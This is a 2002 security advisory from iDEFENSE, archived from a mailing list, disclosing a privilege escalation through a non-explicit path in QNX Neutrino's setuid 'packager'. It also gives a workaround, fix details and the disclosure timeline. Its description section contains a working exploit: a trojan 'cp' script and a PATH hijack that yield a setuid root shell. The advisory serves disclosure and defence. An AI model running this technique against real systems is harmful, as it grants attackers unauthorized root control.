OSEC

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com
 
From: David Endler (dendler_at_idefense.com)
Date: Fri Nov 08 2002 - 15:04:06 CST

  • Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

    -----BEGIN PGP SIGNED MESSAGE-----
    Hash: SHA1

    iDEFENSE Security Advisory 11.08.02b:
    http://www.idefense.com/advisory/11.08.02b.txt
    Non-Explicit Path Vulnerability in QNX Neutrino RTOS
    November 8, 2002

    I. BACKGROUND

    QNX Software Systems Ltd.'s Neutrino RTOS (QNX) is a real-time
    operating system designed for use in embedded systems. "Companies
    worldwide like Cisco, Delphi, Siemens, Alcatel and Texaco depend on
    the QNX technology for network routers, medical devices, intelligent
    transportation systems, safety and security systems, next-generation
    robotics, and other mission-critical applications. In addition, QNX
    forms the core for Ford Motor Co.'s Lincoln Aviator IAV, an
    engineering concept vehicle. The new system supports the development
    of next-generation in-car communications, infotainment, and
    telematics applications." More information is available at
    http://www.qnx.com/products/ps_neutrino .

    II. DESCRIPTION

    Since a setuid root application packager within QNX inappropriately
    executes external applications without using their full paths, local
    attackers can potentially obtain root privilege. The following is a
    sample exploit (with comments):

    The packager will at one point call the copy binary (cp). The first
    step is to create a tainted copy command and ensure it is executable.
    This copy command will copy a shell to /tmp and give the shell setuid
    privilege:

    $ cat > cp <<EOF
    > #!/bin/sh
    > /bin/cp /bin/sh /tmp/sh
    > chmod 4755 /tmp/sh
    > EOF
    $ chmod 755 cp

    The attacker then modifies the PATH environment variable to search
    the current working directory before anything else:

    $ PATH=$PWD:$PATH

    The attacker now creates a directory and calls the packager on that
    created directory:

    $ mkdir temp
    $ packager temp
    ...

    The packager will ask a number of questions. When the procedure is
    complete, a root shell will be waiting for the attacker:

    $ ls -l /tmp/sh
    - -rwsr-x r-x 1 root 100 153908 May 11 05:36 /tmp/sh

    III. ANALYSIS

    Local attackers that exploit this vulnerability can potentially gain
    total control over a targeted system. The fact that exploitation must
    be done locally makes it more unlikely that damage can be done
    quickly or in a widespread fashion. Still for organizations that may
    still be making use of QNX, insider threat is still a real danger.

    IV. DETECTION

    QNX Neutrino RTOS 6.2.0 is affected. Re-create the above-described
    exploit scenario to determine susceptibility of a RTOS
    implementation.

    V. WORKAROUND

    Use the command chmod -s 'which packager' to remove the setuid bit
    from the packager binary.

    VI. VENDOR FIX

    QNX Neutrino RTOS 6.2.1, which is slated to be released in January
    2002, should fix this vulnerability. According to QNX, concerned
    customers can contact their sales rep for an advance copy.
     
    VII. CVE INFORMATION

    The Mitre Corp.'s Common Vulnerabilities and Exposures (CVE) Project
    assigned the identification number CAN-2002-1239 to this issue.

    VIII. DISCLOSURE TIMELINE

    10/02/2002 Issue disclosed to iDEFENSE
    10/31/2002 QNX notified (supportqnx.com)
    10/31/2002 iDEFENSE clients notified
    11/01/2002 Response received from Marcin Dzieciol (marcindqnx.com)
    11/07/2002 Response received from Rodney Dowdell
    11/08/2002 Phone conversation with Barry Faubert, Tech Support
    11/08/2002 Public disclosure

    IX. CREDIT

    Texonet (http://www.texonet.com) discovered this vulnerability.

    Get paid for security research
    http://www.idefense.com/contributor.html

    Subscribe to iDEFENSE Advisories:
    send email to listservidefense.com, subject line: "subscribe"

    About iDEFENSE:

    iDEFENSE is a global security intelligence company that proactively
    monitors sources throughout the world from technical
    vulnerabilities and hacker profiling to the global spread of viruses
    and other malicious code. Our security intelligence services provide
    decision-makers, frontline security professionals and network
    administrators with timely access to actionable intelligence
    and decision support on cyber-related threats. For more information,
    visit http://www.idefense.com.

    - -dave

    David Endler, CISSP
    Director, Technical Intelligence
    iDEFENSE, Inc.
    14151 Newbrook Drive
    Suite 100
    Chantilly, VA 20151
    voice: 703-344-2632
    fax: 703-961-1071

    dendleridefense.com
    www.idefense.com

    -----BEGIN PGP SIGNATURE-----
    Version: PGP 7.1.2
    Comment: http://pgp.mit.edu:11371/pks/lookup?op=get&search=0x4B0ACC2A

    iQA+AwUBPcwmZUrdNYRLCswqEQIZkQCYq0OO58lTS6Ib+q26PSx085XXqgCfWPhd
    F5wgy3retkUyneTrZbtG4pk=
    =rZxj
    -----END PGP SIGNATURE-----